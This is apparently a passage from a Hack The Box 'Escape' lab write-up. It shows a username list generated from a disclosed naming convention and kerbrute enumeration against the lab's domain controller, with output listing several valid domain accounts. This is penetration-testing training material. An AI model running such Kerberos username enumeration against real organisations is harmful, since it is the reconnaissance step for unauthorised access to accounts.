Naming Convention
The naming convention that the target organization appears to use has been disclosed from the PDF file.
Wordlist
┌──(kali㉿kali)-[~/archive/htb/labs/escape]
└─$ python3 ~/Tools/username_generator.py
Choose username format:
1) hsimpson
2) h.simpson
3) homersimpson
4) homer.simpson
5) hjsimpson
6) homerjsimpson
7) homerjaysimpson
8) homersimpsonb
Option: 4
Mail domain (example: ...@domain.com) [Default: none]:
Domain (example: domain\...) [Default: none]:
Names file path: /usr/share/wordlists/seclists/Usernames/Names/names-usa-top2000.txt
Surnames file path: /usr/share/wordlists/seclists/Usernames/Names/familynames-usa-top1000.txt
Output file [Default: results.txt]: /home/kali/archive/htb/labs/escape/result.txt
Output saved in /home/kali/archive/htb/labs/escape/result.txtI will first generate a list of potential usernames following the naming convention
┌──(kali㉿kali)-[~/archive/htb/labs/escape]
└─$ wc -l result.txt
2000000 result.txtThe generated list contains 2 million usernames
Username Extraction
┌──(kali㉿kali)-[~/archive/htb/labs/escape]
└─$ kerbrute userenum --dc $IP -d SEQUEL.HTB ./result.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
version: v1.0.3 (9dad6e1) - 08/13/23 - Ronnie Flathers @ropnop
2023/08/13 02:43:55 > Using KDC(s):
2023/08/13 02:43:55 > 10.10.11.202:88
2023/08/13 02:45:06 > [+] VALID USERNAME: BRANDON.BROWN@SEQUEL.HTB
2023/08/13 02:48:46 > [+] VALID USERNAME: NICOLE.THOMPSON@SEQUEL.HTB
2023/08/13 02:56:12 > [+] VALID USERNAME: JAMES.ROBERTS@SEQUEL.HTB
2023/08/13 02:56:28 > [+] VALID USERNAME: JAMES.ROBERTS@SEQUEL.HTB
2023/08/13 03:01:43 > [+] VALID USERNAME: RYAN.COOPER@SEQUEL.HTBkerbrute returned a total of 5 users including some friendly ones from the PDF file
saved to the users.txt file